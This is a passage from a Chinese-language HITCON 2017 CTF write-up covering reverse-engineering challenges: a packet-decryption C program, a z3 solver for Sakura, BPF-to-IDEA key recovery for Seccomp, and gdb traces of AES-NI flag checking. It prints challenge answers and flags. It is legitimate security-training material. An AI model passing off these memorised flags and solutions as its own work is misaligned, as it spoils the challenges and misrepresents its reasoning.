        0x95, 0x1a, 0xb5, 0x6c, 0xf8, 0xf3, 0xce, 0xd0, 
        0xad, 0x88, 0xfb, 0xac, 0xfd, 0x23, 0xe2, 0xe6, 
        0x26, 0x51, 0xa5, 0xcb, 0x23, 0x85, 0xcd, 0xfe, 
        0x89, 0x29, 0xab, 0x65, 0x74, 0xd1, 0xc6, 0x31, 
        0xf7, 0x24, 0x7b, 0x1f, 0xbf, 0x3c, 0x50, 0xa0, 
        0xd1, 0xe8, 0x13, 0x4a, 0xd6, 0x25, 0x1c, 0x44, 
        0xfd, 0x99, 0xad, 0xf3, 0xbe, 0xe6, 0x29, 0xb7, 
        0xf1, 0x94, 0x12, 0x52, 0x3a, 0xc2, 0x5a, 0x24, 
        0xef, 0x64, 0xc4, 0xe2, 0xa2, 0x78, 0x2b, 0x4a, 
        0x17, 0xf6, 0x5f, 0x54, 0x76, 0x81, 0xed, 0x57, 
        0xe6, 0x87, 0x49, 0xf2, 0xdf, 0x3e, 0x28, 0x0d, 
        0x6c, 0xae, 0x06, 0xed, 0xae, 0x4f, 0xc3, 0x6d, 
        0xee, 0xea, 0xee, 0x86, 0xa1, 0x42, 0x46, 0x52, 
        0x2f, 0x6b, 0xb5, 0x94, 0x1f, 0x88, 0xb7, 0xbc, 
        0x04, 0xe3, 0xfe, 0x83, 0x30, 0x22, 0x43, 0x9a, 
        0x03, 0x5d, 0xba, 0x3e, 0x32, 0x49, 0xa4, 0xa4, 
        0x47, 0x3d, 0xee, 0x2c, 0x5c, 0x91, 0x53, 0x7c, 
        0x9f, 0x74, 0x2c, 0x4e, 0x39, 0x8c, 0xc8, 0xd9, 
        0x09, 0xcb, 0x8f, 0xb3, 0x22, 0xf6, 0xf9, 0xe8, 
        0xff, 0xd1, 0x07, 0x3a, 0xd7, 0xee, 0xf6, 0x59, 
        0x82, 0xcc, 0xc2, 0xbe, 0xc9, 0x37, 0x13, 0xcb, 
        0x39, 0x37, 0x56, 0xea, 0x4c, 0xc2, 0x46, 0xac, 
        0xe3, 0x89, 0xe2, 0xe0, 0xcc, 0x25, 0x7d, 0x8b, 
        0x08, 0xf6, 0x11, 0x2b, 0x4d, 0x60, 0xd5, 0x2b, 
        0x6e, 0xae, 0x0d, 0x14, 0x8e, 0x9e, 0x69, 0x92, 
        0xa6, 0xfe, 0xd1, 0xc1, 0x8e, 0xc6, 0x36, 0xd6, 
        0x35, 0x44, 0xc5, 0x03, 0x56, 0xca, 0xdd, 0xbd, 
        0x4d, 0xe1, 0x9a, 0xee, 0xbe, 0x5d, 0x31, 0xf5, 
        0x26, 0x26, 0x29, 0x30, 0x0e, 0x37, 0xea, 0x28, 
        0xd2, 0x83, 0x03, 0xbb, 0xa0, 0x5b, 0x7f, 0x36, 
        0xd8, 0x81, 0x45, 0x83, 0x37, 0x6b, 0xf8, 0x55, 
        0x8f, 0x16, 0xf8, 0x53, 0x71, 0xd3, 0x8f, 0xa0, 
        0xea, 0x10, 0x13, 0xfd, 0xf4, 0x94, 0x31, 0x27, 
        0x4c, 0x30, 0xde, 0xd9, 0xbd, 0x78, 0x30, 0xf7, 
        0x8b, 0x84, 0x16, 0x66, 0xbd, 0x70, 0x3a, 0x4c, 
        0xd8, 0xb2, 0x7d, 0xb3, 0x13, 0xbf, 0xf8, 0xed, 
        0x4d, 0xeb, 0xeb, 0xea, 0x9d, 0x33, 0xae, 0xef, 
        0x5b, 0x94, 0xe9, 0x0c, 0xf7, 0xb3, 0x84, 0x87, 
        0x37, 0xf0, 0x5f, 0xa6, 0x65, 0x1e, 0x11, 0xcc, 
        0x84, 0x07, 0x21, 0x7a, 0x5a, 0x46, 0x14, 0x08, 
        0x01, 0xb7, 0xf2, 0xdb, 0x43, 0xf1, 0x59, 0x09, 
        0xd2, 0x4a, 0x5c, 0x08, 0x2d, 0x40, 0xaa, 0x43, 
        0x13, 0x2f, 0x1f, 0xf6, 0x5c, 0xac, 0x00, 0xf4, 
        0x78, 0xbb, 0xa1, 0x77, 0xd7, 0x78, 0x57, 0x6c, 
        0x10, 0x1d, 0xfc, 0xd2, 0x6f, 0x4e, 0x15, 0xcb, 
        0xfa, 0xf5, 0xee, 0x60, 0x2b, 0xc1, 0x10, 0x26, 
        0xb8, 0xed, 0xd9, 0xa7, 0x48, 0x3a, 0x4b, 0xa4, 
        0xe5, 0xcb, 0xcb, 0x12, 0x0c, 0xd1, 0x83, 0x99, 
        0xb5, 0x23, 0x4f, 0xd2, 0xa7, 0xb6, 0x1a, 0x38, 
        0x4d, 0x5c, 0x88, 0x01, 0x7a, 0x7b, 0xde, 0xb2, 
        0x95, 0xcc, 0xe5, 0x95, 0x35, 0xb7, 0x5f, 0xc7, 
        0x86, 0x39, 0xba, 0x04, 0xe5, 0xf7, 0xb6, 0xb3, 
        0x19, 0x5a, 0x45, 0x73, 0x7a, 0xe1, 0x70, 0x3a, 
        0x6a, 0xce, 0x8d, 0x8f, 0xe8, 0xb5, 0x0b, 0x53, 
        0xb3, 0xda, 0x01, 0xcd, 0x20, 0x3f, 0x30, 0xcb, 
        0x72, 0x75, 0x60, 0xd2, 0x90, 0xac, 0x3d, 0x1f, 
        0x20, 0x1e, 0x6c, 0xa0, 0x27, 0x42, 0xe1, 0x6f, 
        0xae, 0x48, 0x2c, 0xef, 0x0a, 0x0d, 0x0d, 0xe2, 
        0xe0, 0xdd, 0xe1, 0x47, 0x9d, 0x12, 0xcc, 0xbe, 
        0x4f, 0xf7, 0xdc, 0xb3, 0xcc, 0x78, 0x10, 0xde, 
        0xea, 0x29, 0xdf, 0xff, 0x00, 0x7d, 0xf5, 0x3f, 
        0x7f, 0xcb, 0x68, 0xf1, 0xaa, 0x8e, 0xca, 0xbb, 
        0xb9, 0xd0, 0xc8, 0xf0, 0x5f, 0x36, 0x89, 0x05, 
        0xdd, 0x4c, 0x0f, 0x42, 0xee, 0xd4, 0x30, 0xd4, 
        0xdc, 0xce, 0xcf, 0x09, 0xb0, 0x9b, 0x4d, 0x31, 
        0xec, 0x1b, 0xdb, 0xa8, 0x82, 0x3a, 0x29, 0x77, 
        0x29, 0xae, 0x35, 0x5a, 0x99, 0xbc, 0xad, 0xbe, 
        0x15, 0x53, 0x8f, 0x33, 0x57, 0x26, 0xcb, 0xf1, 
        0xff, 0xf5, 0x77, 0x96, 0xbf, 0x0f, 0x52, 0xc0, 
        0xda, 0xaf, 0x8c, 0x1d, 0x2d, 0x4f, 0x14, 0x31, 
        0xd7, 0x85, 0x70, 0xe7, 0xba, 0xf3, 0x12, 0xee, 
        0x07, 0x64, 0xe5, 0x55, 0xd8, 0x73, 0xa7, 0xe8, 
        0x11, 0x05, 0x2c, 0xc6, 0xe4, 0x7e, 0x75, 0x0a, 
        0x5b, 0x6a, 0x62, 0x6b, 0xcc, 0x51, 0x23, 0xb2, 
        0x65, 0x74, 0xf3, 0xf5, 0xec, 0x68, 0x72, 0xf3, 
        0xbc, 0x99, 0xab, 0x7b, 0xf5, 0x37, 0xc0, 0x91, 
        0xd2, 0x52, 0x99, 0x99, 0xd8, 0x4f, 0x20, 0x5f, 
        0x57, 0x39, 0x44, 0x86, 0x82, 0xd6, 0x8e, 0x18, 
        0xd1, 0xbb, 0x7b, 0x24, 0x9a, 0x71, 0x9f, 0x18, 
        0x02, 0xca, 0x91, 0xf4, 0xe6, 0x71, 0x1c, 0x16, 
        0xe1, 0x39, 0x0d, 0x63, 0x1f, 0x32, 0xbb, 0x6d, 
        0xc8, 0xe2, 0x83, 0x23, 0x20, 0x36, 0x39, 0x4c, 
        0x6b, 0x8e, 0x00, 0x50, 0x03, 0x9d, 0xae, 0x83, 
        0x6b, 0x0d, 0xb8, 0x67, 0x06, 0x34, 0xb2, 0x0b, 
        0xed, 0xd5, 0x47, 0x0e, 0x7c, 0xd0, 0xee, 0xa3, 
        0x17, 0xbf, 0xfb, 0x4d, 0x23, 0x04, 0x15, 0x4c, 
        0x54, 0xfa, 0xd6, 0x18, 0x0e, 0x50, 0x61, 0xb2, 
        0x89, 0xee, 0x07, 0x41, 0xdd, 0x79, 0x3b, 0x2f, 
        0xa5, 0xfa, 0xae, 0x56, 0x39, 0x54, 0xf2, 0xe9, 
        0xcd, 0x8d, 0xa7, 0x7e, 0x19, 0x1b, 0x05, 0x20, 
        0xb2, 0x45, 0xd8, 0x04, 0x33, 0xaa, 0xb7, 0x76, 
        0x25, 0x2d, 0x4b, 0xaf, 0x70, 0x3a, 0x70, 0xf1, 
        0x08, 0xbf, 0x5d, 0xc9, 0xa9, 0xaa, 0xf1, 0xfc, 
        0x16, 0x54, 0x10, 0x70, 0x2e, 0x58, 0x97, 0xb3, 
        0x39, 0x9a, 0x6d, 0x94, 0x43, 0xd9, 0xab, 0x03, 
        0x19, 0x42, 0x56, 0xf2, 0x31, 0x37, 0x7d, 0xa6, 
        0x56, 0x4e, 0xcc, 0x03, 0x79, 0x9b, 0xb3, 0xfb, 
        0xa7, 0xe6, 0xca, 0xe8, 0x50, 0xa9, 0x72, 0xfe, 
        0x51, 0x08, 0x9b, 0xcb, 0x3a, 0x6a, 0x33, 0x2a, 
        0xae, 0xba, 0xfa, 0xcf, 0x20, 0x0c, 0xd3, 0x35, 
        0x94, 0xaa, 0x63, 0x96, 0x8e, 0x73, 0x78, 0x4d, 
        0x61, 0xd6, 0x7d, 0x9f, 0x55, 0x22, 0x27, 0x7b, 
        0x88, 0x7c, 0xe5, 0x51, 0xe4, 0x17, 0x8f, 0xcb, 
        0x36, 0x4b, 0x70, 0xd9, 0x23, 0x7c, 0xf2, 0xfc, 
        0x97, 0x19, 0xed, 0xdc, 0xc2, 0xce, 0xd5, 0xb2, 
        0x42, 0x61, 0x4d, 0xb4, 0x5a, 0x3d, 0x94, 0x71, 
        0x2f, 0x3b, 0x64, 0xd2, 0x66, 0x79, 0x1e, 0x6e, 
        0x9d, 0xe4, 0xe9, 0x7d, 0x69, 0x70, 0x48, 0x56, 
        0x04, 0xba, 0x35, 0x81, 0x05, 0x3a, 0xc0, 0x04, 
        0x24, 0x48, 0x9a, 0x44, 0xd5, 0x14, 0xd3, 0xdf, 
        0x06, 0x48, 0xe0, 0xbb, 0xb5, 0xb7, 0x77, 0xf5, 
        0xbf, 0x33, 0xc5, 0x01, 0x8e, 0xeb, 0x66, 0x60, 
        0x24, 0xd1, 0x7c, 0xe7, 0xec, 0x48, 0xe3, 0x63, 
        0xcf, 0x8b, 0xab, 0x6c, 0x93, 0xa2, 0x88, 0xa0, 
        0x47, 0x50, 0xf4, 0xcf, 0xd2, 0x12, 0xb0, 0x6e, 
        0x20, 0x22, 0xcc, 0x86, 0xd6, 0xbc, 0x0c, 0xe2, 
        0x4a, 0x99, 0xb8, 0x48, 0xd1, 0x1c, 0xf9, 0x4a, 
        0x7d, 0x0f, 0x7d, 0x82, 0x45, 0x0a, 0x41, 0xff, 
        0xc7, 0x21 };
        char peer1_8[] = { /* Packet 216 */
        0xac, 0x3b, 0x5b, 0xa0, 0xa1, 0xc4, 0x71, 0x55, 
        0x6d, 0x55, 0xa0, 0x0d };
        char peer0_9[] = { /* Packet 217 */
        0xa7, 0x05, 0xd3, 0x10, 0xcf, 0x6d, 0x3e, 0x7f, 
        0xcb, 0x42, 0xa9, 0x6e, 0xb7, 0xd8, 0x60, 0x37, 
        0xfb, 0x4a, 0xa1, 0x14, 0x83, 0x19, 0xe1, 0x8f, 
        0x17, 0x5a, 0x61, 0xfb, 0x0b, 0x98, 0x35, 0xb7, 
        0x66, 0x2c, 0xa7, 0xde, 0x3b, 0x5c, 0x69, 0x89, 
        0x01, 0xb9, 0x48, 0xde, 0xab, 0x75, 0x1e, 0x38, 
        0x99, 0x5e, 0x76, 0xd8, 0xee, 0x1d, 0x85, 0x22, 
        0x63, 0x9a, 0x2b, 0xa2, 0xd7, 0x6b, 0x89, 0x30, 
        0x04, 0x1a, 0x54, 0x96, 0x90, 0xc1, 0x8e, 0x9a, 
        0xa5, 0x87, 0x4a, 0x53, 0xdc, 0x83, 0x34, 0x58, 
        0x03, 0xde, 0x8b, 0x15, 0xb7, 0x2e, 0x96, 0x35, 
        0x26, 0xa5, 0x59, 0xcd, 0x27, 0xbc, 0x52, 0x47, 
        0xa0, 0x1b, 0xe3, 0x30, 0x77, 0xa1, 0x4c, 0x8f, 
        0x69, 0x01, 0x65, 0x49, 0xb0, 0x5e, 0x5c, 0xa1, 
        0x2e, 0x6a, 0xd4, 0xd5, 0x14, 0x8b, 0xe4, 0xbd, 
        0x3e, 0x2a, 0x92, 0x19, 0x47, 0x07, 0x4d, 0x59, 
        0x63, 0x37, 0x65, 0xcb, 0x75, 0x9c, 0x73, 0xd0, 
        0xf1, 0xa6, 0xae, 0xaf, 0x7a, 0xf1, 0xbc, 0x7c, 
        0x33 };
        char peer1_9[] = { /* Packet 219 */
        0x66, 0xa0, 0xc4, 0xe8, 0x17, 0xd6, 0xb9, 0x88, 
        0x5f, 0xcd, 0x50, 0x8e, 0x86, 0x05, 0x9a, 0x2b, 
        0xce };
        char peer0_10[] = { /* Packet 220 */
        0x35, 0x17, 0xb5, 0xe0, 0x9d, 0xce, 0xfc, 0x4a, 
        0xd5, 0x0b, 0x99, 0xef, 0x64, 0x41, 0x51, 0x03, 
        0xbd, 0xf6, 0xc3, 0x09, 0xb7, 0x10, 0x11, 0xb0, 
        0x07, 0x76, 0x32, 0x03, 0xdf, 0x4c, 0x03, 0x23, 
        0xb7, 0x83, 0xb9, 0x98, 0x79, 0xa4, 0x7d, 0x3e, 
        0x5a, 0x09, 0x4b, 0x55, 0xb6, 0xd4, 0x89, 0x60, 
        0x28, 0x49, 0xff, 0x00, 0xf8, 0xf6, 0xa6, 0xcc, 
        0xbb, 0x96, 0xc0, 0x71, 0x49, 0xb5, 0x5d, 0xed, 
        0x57, 0x8b, 0x07, 0x69, 0x2a, 0xd1, 0x3b, 0x2e, 
        0xa2, 0x62, 0x93, 0x98, 0x1e, 0x70, 0xe0, 0x55, 
        0xe6, 0x92, 0x61, 0x7f, 0x78, 0x0b, 0x4d, 0x84, 
        0xc6, 0xc2, 0x2a, 0x23, 0x4a, 0x39, 0x88, 0x2b, 
        0xf8, 0x13, 0x76, 0x86, 0x64, 0x80, 0x47, 0x33, 
        0x76, 0x9c, 0x00, 0xd9, 0x98, 0x0d, 0x92, 0x19, 
        0x93, 0x15, 0x0b, 0x80, 0xad, 0x15, 0x2e, 0x6c, 
        0x2d, 0x1b, 0xd0, 0xf8, 0x15, 0x2f, 0x6b, 0xbc, 
        0xd2, 0x99, 0x4b, 0xac, 0xe2, 0x6e, 0x32, 0xd8, 
        0x68, 0x95, 0x03, 0x1b, 0xf5, 0xf1, 0xc4, 0xeb, 
        0x18, 0xc3 };
        char peer1_10[] = { /* Packet 222 */
        0x5b, 0x7c, 0xae, 0x1a, 0x19, 0x88, 0x75, 0x7e, 
        0xab, 0x08, 0x6f, 0x1e, 0xaa, 0x04, 0x0e, 0x0d, 
        0xff, 0x7c, 0x0e, 0xef, 0xd0, 0x79, 0x8e };
        char peer0_11[] = { /* Packet 223 */
        0x38, 0x22, 0xd8, 0x99, 0xe8, 0x7b, 0x5e, 0x3a, 
        0x34, 0x88, 0xc8, 0x14, 0x7d, 0xc0, 0xac, 0x7c, 
        0xdb, 0x6f, 0x66, 0x69, 0xd1, 0x3e, 0x48, 0x69, 
        0x68, 0x62, 0x19, 0xb0, 0x62, 0xe7, 0x54, 0x93, 
        0x1f, 0xa5, 0xaf, 0x19, 0x64, 0x73, 0x26, 0xe2, 
        0xc1, 0x03, 0x55, 0xbb, 0x43, 0x97, 0xb6 };
        
#define DEC(x) decrypt(&context,x,sizeof(x));puts(x);
int main(int argc,char **argv)
{
    char key[0x20] = {0xb0, 0xf8, 0x70, 0xfb, 0x75, 0x87, 0xc0, 0x48, 
    0x2b, 0xb7, 0xf7, 0xc1, 0xf7, 0x39, 0x1f, 0x9e, 
    0x66, 0xde, 0x2c, 0xd9, 0x25, 0x58, 0xca, 0x1f, 
    0x87, 0xf2, 0xdf, 0x23, 0x2f, 0xed, 0xc7, 0xda };
    ctx context;
    crypt_ctx_init(&context,key);
    DEC(peer1_2)
    DEC(peer0_3);
    DEC(peer1_3);
    DEC(peer0_4);
    DEC(peer1_4);
    DEC(peer0_5);
    DEC(peer1_5);
    DEC(peer0_6);
    DEC(peer1_6);
    DEC(peer0_7);
    DEC(peer1_7);
    DEC(peer0_8);
    DEC(peer1_8);
    DEC(peer0_9);
    DEC(peer1_9);
    DEC(peer0_10);
    DEC(peer1_10);
    DEC(peer0_11);
    //DEC(peer0_4);
    return 0;
}

HITCON2017 writeup

发表于 2017-11-08 | | 阅读次数:

Reverse

Sakura

一个大函数、稍微IDA里标一下函数名然后grep出来调用顺序到文件，然后把栈上那些变量按顺序填入d = dict()然后直接z3

import z3
x = [z3.BitVec(i, 16) for i in range(400)]
s = z3.Solver()
'''
  pEnd = get_end_pointer_2rp((__int64)&v904);
  if ( sum != 17 )
'''
l = open('haha','r').read().split(')\n')
for token in l:
  if 'rp(' not in token: break
  print token
  pos = token.index('rp(')
  cparameter = int(token[pos-1:pos],10)
  pos = token.index('&v')+1
  print token[pos+2:token.index(';')-2]
  oparameter = int(token[pos+1:token.index(';')-1],10)
  pos = token.index('!= ')
  final = int(token[pos+3:],10)
  flag = 0
  sum = 0
  for i in range(cparameter):
    p = d[oparameter+i*2]*20+d[oparameter+i*2+1]
    s.add(x[p]>0)
    s.add(x[p]<=9)
    s.add((flag>>x[p])&1!=1)
    flag |= 1<<x[p]
    sum+=x[p]
  s.add(sum==final)
print s.check()
if s.check() == z3.sat:
    m = s.model()
    print m
    flag = map(lambda sym: m[sym], x)
    print flag

跑出来

[None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, 9, 2, None, None, None, None, 4, 1, None, None, None, None, 9, 1, None, 1, 7, None, 3, 7, 8, 1, 9, 2, None, None, 6, 3, 8, None, 4, 6, 8, 3, None, 2, 9, 6, 1, 8, None, None, 8, 1, None, 7, 1, None, 9, 8, 3, 7, None, None, None, None, 8, 9, None, 9, 2, None, None, None, None, 9, 3, 6, None, 9, 1, 5, None, None, None, None, None, 8, 1, None, 1, 2, None, None, None, 8, 2, 1, 6, None, 2, 8, 4, 3, None, None, None, None, 3, 1, None, 1, 2, None, None, None, None, 4, 9, 8, None, 9, 3, 1, None, 3, 7, None, None, 2, 9, 3, 4, 1, None, None, None, 3, 7, 9, 2, None, 6, 2, None, 1, 9, 2, 8, 3, 7, None, 1, 2, None, 7, 1, 2, 8, None, 1, 7, 2, None, None, None, None, 1, 9, None, None, None, None, None, None, 9, 2, None, None, None, None, 9, 1, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, 1, 4, None, 6, 5, None, None, None, 2, 7, 1, None, 4, 9, None, None, None, None, 4, 1, 8, 3, 5, 7, 9, 2, None, None, 8, 9, 6, 4, 1, 2, 7, 5, None, 1, 2, 5, None, 1, 3, None, 7, 3, None, 9, 1, None, None, 5, 3, None, 3, 7, None, 7, 6, None, 7, 2, None, 8, 6, None, None, 8, 6, None, None, None, 2, 6, None, None, None, None, 9, 4, 8, None, 5, 1, 2, None, None, None, 5, 3, None, None, None, 3, 6, None, None, None, 5, 7, None, 1, 8, None, 8, 6, None, None, None, 5, 2, None, None, None, 5, 1, None, 4, 8, None, 4, 9, None, 5, 3, 8, None, 8, 5, None, 6, 9, None, None, 8, 5, None, 1, 7, 8, 6, 3, 2, 9, 4, None, None, 7, 3, 6, 1, 5, 2, 8, 4, None, None, None, 3, 1, None, 7, 4, None, None, None, None, None, None, 3, 5, None, 1, 2, 3, None]

然后"".join(['0' if x==None else str(x) for x in a])
得到答案0000000000000000000000000092000041000091017037819200638046830296180081071098370000890920000936091500000810120008216028430000310120000498093103700293410003792062019283701207128017200001900000092000091000000000000000000000000014065000271049000041835792008964127501250130730910053037076072086008600026000094805120005300036000570180860005200051048049053808506900850178632940073615284000310740000003501230

Seccomp

bpf reverse
首先用工具把汇编导出来，然后观察了一阵发现一共有几个pattern，写一个脚本让流程看的更清楚一点

import struct
def parse():
    s = open('dis.txt', 'rb').read()
    s = s.replace('\r', '').split('\n')
    o = []
    for i in s:
        t = i.split('\t')[1].split(' ')
        o.append(map(lambda x: x.replace(',', ''), t))
    return o
def run(ins):
    def is_match(src,seq):
        seq_c = 0
        for k in range(len(seq)):
            if src[k][0] == seq[k]:
                seq_c +=1
        if seq_c==len(seq):
            return True,[src[0][1],src[-1][1]]
        return False,[]
    def opd(s):
        if s.startswith('[') and s.endswith(']'):
            i = int(s[1:-1])
            if i == 0:
                return 0x1337
            return x[(i - 16) / 4]
        elif s.startswith('#'):
            t = s[1:]
            if t.startswith('0x'):
                return int(t, 16)
            else:
                return int(t, 10)
        elif s.startswith('M[') and s.endswith(']'):
            return M[int(s[2:-1])]
        elif s == 'x':
            return X
        else:
            print s
            raise Exception('wtf')
    def p16(a):
        return struct.pack(">H",a)
    idx = 17
    key = []
    while idx < len(ins):
        i = ins[idx]
        op = i[0]
        if op == 'ld':
            seq = ['ld','jeq','ld','mul','tax','div','mul','neg','add','jeq','ld','st']
            res = is_match(ins[idx:idx+len(seq)],seq)
            if res[0]:
                #print "%s = %s * %d %% 0x10001"%(res[1][1],res[1][0],opd(ins[idx+3][1]))
                key.append(struct.pack(">H",opd(ins[idx+3][1])))
                idx+=len(seq)
                continue
            seq = ['ld','add','and','st']
            res = is_match(ins[idx:idx+len(seq)],seq)
            if res[0]:
                #print "%s = (%s + %d) & 0xffff"%(res[1][1],res[1][0],opd(ins[idx+1][1]))
                key.append(struct.pack(">H",opd(ins[idx+1][1])))
                idx+=len(seq)
                continue
            seq = ['ld','ldx','xor','st']
            res = is_match(ins[idx:idx+len(seq)],seq)
            if res[0]:
                #print "%s = %s ^ %s"%(res[1][1],res[1][0],ins[idx+1][1])
                idx+=len(seq)
                continue
            seq = ['ld','ldx','add','and','st']
            res = is_match(ins[idx:idx+len(seq)],seq)
            if res[0]:
                #print "%s = (%s + %s) & 0xffff"%(res[1][1],res[1][0],ins[idx+1][1])
                idx+=len(seq)
                continue
            seq = ['ld','ldx','stx','st']
            res = is_match(ins[idx:idx+len(seq)],seq)
            if res[0]:
                #print "swap(%s,%s)"%(res[1][1],res[1][0])
                idx+=len(seq)
                continue
            print idx,"error"
            exit()
        elif op=='ldx':
            enc = p16(opd(ins[idx][1])^opd(ins[idx+3+12][1]))+p16(opd(ins[idx][1])^opd(ins[idx+3+8][1]))+p16(opd(ins[idx][1])^opd(ins[idx+3+4][1]))+p16(opd(ins[idx][1])^opd(ins[idx+3][1]))
            print "d = '%s'.decode('hex')"%enc.encode('hex')
        idx+=31
        print 'key = "%s"'%"".join(key)[:16]
        print "cipher = IDEA.new(key,IDEA.MODE_ECB,)\na.append(cipher.decrypt(d)[::-1])"
        key = []
        continue
        print ins[idx]
        print "error"
        exit()
ins = parse()
run(ins)

会发现输入是4个word输出4个word，然后8轮这样的算法，确定是IDEA，改一下上面的脚本输出解密代码

M[0] = M[0] * 26465 % 0x10001
M[1] = (M[1] + 27750) & 0xffff
M[2] = (M[2] + 24421) & 0xffff
M[3] = M[3] * 27489 % 0x10001
M[4] = M[0] ^ M[2]
M[5] = M[1] ^ M[3]
M[4] = M[4] * 26207 % 0x10001
M[5] = (M[4] + M[5]) & 0xffff
M[5] = M[5] * 24927 % 0x10001
M[4] = (M[4] + M[5]) & 0xffff
M[0] = M[0] ^ M[5]
M[1] = M[1] ^ M[4]
M[2] = M[2] ^ M[5]
M[3] = M[3] ^ M[4]
swap(M[2],M[1])

from CryptoPlus.Cipher import IDEA
a = []
d = 'bda9a256044419b0'.decode('hex')
key = "galf_ekaf_a_ma_I"
cipher = IDEA.new(key,IDEA.MODE_ECB,)
a.append(cipher.decrypt(d)[::-1])
d = '888c2d1a2d5580cd'.decode('hex')
key = "ver_yr7_n0_emoC_"
cipher = IDEA.new(key,IDEA.MODE_ECB,)
a.append(cipher.decrypt(d)[::-1])
d = 'a0a7aab80005558d'.decode('hex')
key = "nikxxf_siht_esre"
cipher = IDEA.new(key,IDEA.MODE_ECB,)
a.append(cipher.decrypt(d)[::-1])
d = 'dff79b5d009e1498'.decode('hex')
key = "!selur_pmocces_g"
cipher = IDEA.new(key,IDEA.MODE_ECB,)
a.append(cipher.decrypt(d)[::-1])
d = '8fd875f0c7ef4e09'.decode('hex')
key = "galf_ekaf_a_ma_I"
cipher = IDEA.new(key,IDEA.MODE_ECB,)
a.append(cipher.decrypt(d)[::-1])
print "hitcon{%s}"%"".join(a)
hitcon{w0w_y0u_are_Master-0F-secc0mp///>_w_<///

家徒四壁~Everlasting Imaginative Void~

debug

0x000000e719e62000 0x000000e719e63000 r-xp	/tmp/void-1b63cbab5d58da4294c2f97d6b60f568
0x000000e71a062000 0x000000e71a063000 r--p	/tmp/void-1b63cbab5d58da4294c2f97d6b60f568
0x000000e71a063000 0x000000e71a064000 rw-p	/tmp/void-1b63cbab5d58da4294c2f97d6b60f568
=> 0xe719e62935:	call   0xe719e62284
   0xe719e6293a:	push   0xa
   0xe719e6293c:	pop    rax
   0xe719e6293d:	push   rdi
=> 0xe719e62284:	pop    rdi
   0xe719e62285:	mov    al,BYTE PTR [rdi+0x200715]
   0xe719e6228b:	cmp    al,0x21
   0xe719e6228d:	jne    0xe719e62297
!
RAX: 0xe71a062e48 --> 0x1c
RBX: 0x7f52f7cb1168 --> 0xe719e62000 --> 0x10102464c457f
RCX: 0x4
RDX: 0x1
RSI: 0x0
RDI: 0x7f52f7cb0948 --> 0x0
RBP: 0x7ffe684992c0 --> 0x7f52f7a845f8 --> 0x7f52f7a85c40 --> 0x0
RSP: 0x7ffe684991f0 --> 0xe719e6293a --> 0x3aef816657580a6a
RIP: 0xe719e62284 --> 0x3c00200715878a5f
R8 : 0x4
R9 : 0x3
R10: 0x7ffe68499218 --> 0x7f52f7cb09d8 --> 0x7f52f7a8a000 --> 0x10102464c457f
R11: 0x3
R12: 0xe71a062dd0 --> 0xe719e626b0 (cmp    BYTE PTR [rip+0x200969],0x0        # 0xe71a063020)
R13: 0x1
R14: 0x7ffe68499200 --> 0x7f52f7cb1168 --> 0xe719e62000 --> 0x10102464c457f
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
=> 0xe719e62284:	pop    rdi
   0xe719e62285:	mov    al,BYTE PTR [rdi+0x200715]
   0xe719e6228b:	cmp    al,0x21
   0xe719e6228d:	jne    0xe719e62297
[------------------------------------stack-------------------------------------]
0000| 0x7ffe684991f0 --> 0xe719e6293a --> 0x3aef816657580a6a
sys_mprotect(0xe719e62000,0x1000)
RSI: 0x1000
RDI: 0xe719e62000 --> 0x10102464c457f
   0xe719e62284:	pop    rdi
   0xe719e62285:	mov    al,BYTE PTR [rdi+0x200715]
   0xe719e6228b:	cmp    al,0x21
   0xe719e6228d:	jne    0xe719e62297
   0xe719e6228f:	call   rdi
   0xe719e62291:	add    rdi,0x15
   0xe719e62295:	jmp    rdi
   0xe719e62297:	ret
.eh_frame:000000000000094F                 xor     ecx, ecx
.eh_frame:0000000000000951                 add     di, 0FEF9h
.eh_frame:0000000000000956                 push    rdi
.eh_frame:0000000000000957                 push    rdi
.eh_frame:0000000000000958                 pop     rsi
.eh_frame:0000000000000959                 pop     rbx
.eh_frame:000000000000095A
.eh_frame:000000000000095A loc_95A:                                ; CODE XREF: .eh_frame:0000000000000965j
.eh_frame:000000000000095A                 mov     cl, [rsi]
.eh_frame:000000000000095C                 test    cl, cl
.eh_frame:000000000000095E                 js      short loc_967
.eh_frame:0000000000000960                 inc     rsi
.eh_frame:0000000000000963                 rep movsb
.eh_frame:0000000000000965                 jmp     short loc_95A
.eh_frame:0000000000000967 ; ---------------------------------------------------------------------------
.eh_frame:0000000000000967
.eh_frame:0000000000000967 loc_967:                                ; CODE XREF: .eh_frame:000000000000095Ej
.eh_frame:0000000000000967                 add     bx, 17h
.eh_frame:000000000000096B                 jmp     rbx
   0xe719e6285f:	mov    rsi,rbx
   0xe719e62862:	sub    si,0xc7
   0xe719e62867:	add    rbx,0x2007e1
   0xe719e6286e:	movdqu xmm1,XMMWORD PTR [rbx];input
   0xe719e62872:	movdqu xmm0,XMMWORD PTR [rsi];0xfffe07e803fdc148	0xdb312074ed8548ff
   0xe719e62876:	pxor   xmm1,xmm0
   0xe719e6287a:	push   0xa
   0xe719e6287c:	pop    rdi
   0xe719e6287d:	add    rsi,0x10
   0xe719e62881:	movdqu xmm0,XMMWORD PTR [rsi]
   0xe719e62885:	dec    edi
   0xe719e62887:	test   edi,edi
   0xe719e62889:	je     0xe719e62894
   0xe719e6288b:	js     0xe719e6289b negative
=> 0xe719e6288d:	aesenc xmm1,xmm0
   0xe719e62892:	jmp    0xe719e6287d
   0xe719e62894:	aesenclast xmm1,xmm0
   0xe719e62899:	jmp    0xe719e6287d
   0xe719e6289b:	ucomisd xmm0,xmm1
   0xe719e6289f:	je     0xe719e628a2
   0xe719e628a1:	ret
_mm_aesenclast_si128
_mm_aesenc_si128
aesenc xmm1,xmm0 0x10 times
aesenclast xmm1,xmm0
cmp xmm0,xmm1
   0xe719e628a2:	neg    edi
   0xe719e628a4:	push   rdi
   0xe719e628a5:	pop    rax
   0xe719e628a6:	add    rsi,0x10
   0xe719e628aa:	call   0xe719e62948
   0xe719e62948:	push   0x7
   0xe719e6294a:	pop    rdx
   0xe719e6294b:	syscall
   0xe719e6294d:	pop    rdi
   0xe719e6294e:	ret
   gdb-peda$ x/10gx $rsi
0xe719e62798:	0xfffe07e803fdc148,0xdb312074ed8548ff ; init
